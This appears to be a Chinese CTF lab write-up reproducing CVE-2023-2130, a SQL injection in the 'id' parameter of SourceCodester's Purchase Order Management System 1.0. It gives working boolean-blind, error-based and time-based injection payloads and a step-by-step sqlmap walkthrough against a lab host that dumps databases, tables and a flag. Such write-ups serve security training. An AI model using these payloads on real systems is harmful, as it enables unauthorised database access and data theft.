【春秋云镜】CVE-2023-2130漏洞复现exp

目录标题

漏洞介绍

​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

影响版本

sql 复制代码
SourceCodester采购订单管理系统1.0

EXP

sqlmap

bash 复制代码
Parameter: id (GET)
    Type: boolean-based blind   #布尔盲注
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8712=8712 AND 'qmcT'='qmcT

    Type: error-based        #报错注入
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1285=1285,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OHDM'='OHDM
    #floor():利用 GROUP BY 分组时的随机数冲突,触发错误
    Type: time-based blind    #时间盲注
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4238 FROM (SELECT(SLEEP(5)))KfhW) AND 'apvD'='apvD

漏洞复现

一个登录框

抓包登录,回显有内容

存在sql查询语句

查找users表下username=admin,且password=132456的md5值的结果

bash 复制代码
{"status":"incorrect","last_qry":"SELECT * from users where username = 'admin' and password = md5('132456') "}

访问该路径

bash 复制代码
http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php

跟上id参数后出现回显,调用了数据库信息

简单测了一下,单引号存在注入,**--+**可以注释

使用sqlmap去跑,跑数据库

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs 
available databases [4]:
[*] information_schema 
[*] mysql
[*] performance_schema
[*] purchase_order_db

爆数据表

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+

fllllaaaag表下的数据

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --dump

或者爆fllllaaaag表下的列

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --columns
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+

然后再爆破具体的内容

bash 复制代码
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag -C flag --dump

flag

bash 复制代码
flag{ae8dbccb-c588-434a-9da6-e4fd3e9d8f1d} 
相关推荐
搬码临时工几秒前
使用自定义固定公网URL地址远程访问公司内网OA办公系统,本地无需公网IP和专线让外网访问
网络·网络协议·tcp/ip
sheepwjl3 小时前
《嵌入式硬件(三):串口通信》
网络·嵌入式硬件·网络协议·串口通信
noravinsc3 小时前
RPC和HTTP的区别?
网络协议·http·rpc
Suckerbin4 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
lingggggaaaa7 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
XMYX-07 小时前
解决 Apache/WAF SSL 证书链不完整导致的 PKIX path building failed 问题
网络协议·apache·ssl
XXYBMOOO7 小时前
Qt UDP 通信类详解与实现
开发语言·网络·c++·qt·网络协议·ui·udp
dog2507 小时前
乐观并发: TCP 与编程实践
网络·网络协议·tcp/ip
计算机毕设定制辅导-无忧学长11 小时前
MQTT 认证与授权机制实践(二)
网络协议
塔子终结者12 小时前
网络安全A模块专项练习任务十解析
java·服务器·网络安全